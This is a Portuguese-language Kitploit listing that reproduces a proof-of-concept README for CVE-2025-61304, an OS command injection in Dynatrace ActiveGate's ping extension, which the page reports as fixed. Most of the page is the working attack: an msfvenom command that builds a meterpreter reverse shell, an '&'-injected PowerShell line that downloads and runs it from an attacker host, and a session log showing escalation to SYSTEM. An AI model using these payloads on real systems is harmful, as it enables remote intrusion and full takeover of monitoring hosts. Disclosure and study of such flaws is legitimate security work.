Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-61304 — Vulnerabilidade de injeção de comandos no sistema operacional na extensão de ping do Dynatrace ActiveGate até a versão 1.016 por meio de um endereço IP manipulado. | Kitploit
Ferramentas/GitHubGitHub/pentastic-be/cve-2025-61304
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-Exploração
GitHubpentastic-be/cve-2025-61304

CVE-2025-61304

Vulnerabilidade de injeção de comandos no sistema operacional na extensão de ping do Dynatrace ActiveGate até a versão 1.016 por meio de um endereço IP manipulado.

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-61304

"Vulnerabilidade de injeção de comandos do sistema operacional na extensão de ping do Dynatrace ActiveGate até 1.016 via endereço IP manipulado"

Em segundo plano, a extensão de ping usa o prompt de comando do Windows para executar o ping. O campo de entrada para o Test Target Host também tem 1024 caracteres. Após o endereço IP, você pode escrever comandos adicionais para o ActiveGate executar, simplesmente usando um '&'.

Relatado à Dynatrace e corrigido com este commit: https://github.com/Dynatrace/dynatrace-api/pull/99

Exploit de RCE para adicionar usuário:

add_user

Lista de usuários locais antes e depois:

exploit

Outros exemplos de payloads:

  1. Crie um reverse shell meterpreter:
root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
  1. Baixe e execute o shell no ActiveGate por meio da interface em nuvem usando a extensão de ping:
root@kitploit:~
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe

google&c:\test\mshell.exe

  1. Sessão resultante
root@kitploit:~
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.51.200:4444 

[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : WIN-9493M3CRTDV
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
Baixar ferramenta